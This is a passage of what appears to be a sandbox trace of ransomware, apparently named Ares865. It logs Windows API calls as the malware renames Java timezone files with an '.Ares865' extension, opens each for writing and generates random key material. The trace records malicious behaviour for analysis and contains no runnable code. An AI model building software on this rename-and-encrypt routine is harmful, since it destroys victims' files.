(x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5.ares865"), dwFlags=0x1) returned 1 [0134.135] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.135] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.135] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.139] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.139] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.140] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.140] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+6" | out: lpString1="GMT+6") returned="GMT+6" [0134.140] lstrlenW (lpString="GMT+6") returned 5 [0134.140] lstrlenW (lpString="Ares865") returned 7 [0134.140] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6.Ares865") returned 57 [0134.140] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6.ares865"), dwFlags=0x1) returned 1 [0134.142] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.142] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.142] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.145] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.146] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.146] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.147] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+7" | out: lpString1="GMT+7") returned="GMT+7" [0134.147] lstrlenW (lpString="GMT+7") returned 5 [0134.147] lstrlenW (lpString="Ares865") returned 7 [0134.147] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7.Ares865") returned 57 [0134.147] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7.ares865"), dwFlags=0x1) returned 1 [0134.148] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.149] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.149] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.150] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.150] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.152] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.153] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.153] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.153] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+8" | out: lpString1="GMT+8") returned="GMT+8" [0134.153] lstrlenW (lpString="GMT+8") returned 5 [0134.153] lstrlenW (lpString="Ares865") returned 7 [0134.154] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8.Ares865") returned 57 [0134.154] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8.ares865"), dwFlags=0x1) returned 1 [0134.155] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.155] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.156] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.156] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.156] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.159] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.160] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.160] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.160] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT+9" | out: lpString1="GMT+9") returned="GMT+9" [0134.160] lstrlenW (lpString="GMT+9") returned 5 [0134.160] lstrlenW (lpString="Ares865") returned 7 [0134.160] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9.Ares865") returned 57 [0134.161] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9.ares865"), dwFlags=0x1) returned 1 [0134.162] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.162] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.163] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.163] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.163] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.169] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.170] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.170] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.170] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-1" | out: lpString1="GMT-1") returned="GMT-1" [0134.170] lstrlenW (lpString="GMT-1") returned 5 [0134.170] lstrlenW (lpString="Ares865") returned 7 [0134.171] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1.Ares865") returned 57 [0134.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1.ares865"), dwFlags=0x1) returned 1 [0134.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.172] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.172] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.173] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.173] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.176] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.176] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.176] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.177] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-10" | out: lpString1="GMT-10") returned="GMT-10" [0134.177] lstrlenW (lpString="GMT-10") returned 6 [0134.177] lstrlenW (lpString="Ares865") returned 7 [0134.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10.Ares865") returned 58 [0134.177] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10.ares865"), dwFlags=0x1) returned 1 [0134.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.179] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.179] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.180] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.180] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.182] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.184] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-11" | out: lpString1="GMT-11") returned="GMT-11" [0134.184] lstrlenW (lpString="GMT-11") returned 6 [0134.184] lstrlenW (lpString="Ares865") returned 7 [0134.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11.Ares865") returned 58 [0134.184] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11.ares865"), dwFlags=0x1) returned 1 [0134.185] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.185] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.186] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.186] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.186] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.189] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.189] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.189] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.190] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-12" | out: lpString1="GMT-12") returned="GMT-12" [0134.190] lstrlenW (lpString="GMT-12") returned 6 [0134.190] lstrlenW (lpString="Ares865") returned 7 [0134.190] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12.Ares865") returned 58 [0134.190] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12.ares865"), dwFlags=0x1) returned 1 [0134.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.194] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.194] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.195] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.195] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.198] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.198] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.199] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-13" | out: lpString1="GMT-13") returned="GMT-13" [0134.199] lstrlenW (lpString="GMT-13") returned 6 [0134.199] lstrlenW (lpString="Ares865") returned 7 [0134.199] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13.Ares865") returned 58 [0134.199] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13.ares865"), dwFlags=0x1) returned 1 [0134.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.201] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.205] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.206] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.206] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.206] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-14" | out: lpString1="GMT-14") returned="GMT-14" [0134.206] lstrlenW (lpString="GMT-14") returned 6 [0134.206] lstrlenW (lpString="Ares865") returned 7 [0134.207] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14.Ares865") returned 58 [0134.207] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14.ares865"), dwFlags=0x1) returned 1 [0134.209] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.209] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.209] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.210] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.210] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.212] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.213] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.213] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.214] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-2" | out: lpString1="GMT-2") returned="GMT-2" [0134.214] lstrlenW (lpString="GMT-2") returned 5 [0134.214] lstrlenW (lpString="Ares865") returned 7 [0134.214] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2.Ares865") returned 57 [0134.214] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2.ares865"), dwFlags=0x1) returned 1 [0134.215] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.215] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.216] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.216] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.216] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.219] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.220] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.220] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.220] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-3" | out: lpString1="GMT-3") returned="GMT-3" [0134.220] lstrlenW (lpString="GMT-3") returned 5 [0134.220] lstrlenW (lpString="Ares865") returned 7 [0134.221] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3.Ares865") returned 57 [0134.221] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3.ares865"), dwFlags=0x1) returned 1 [0134.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.222] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.222] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.223] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.223] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.227] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-4" | out: lpString1="GMT-4") returned="GMT-4" [0134.227] lstrlenW (lpString="GMT-4") returned 5 [0134.227] lstrlenW (lpString="Ares865") returned 7 [0134.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4.Ares865") returned 57 [0134.227] MoveFileExW (lpExistingFileName="C:\\Program Files 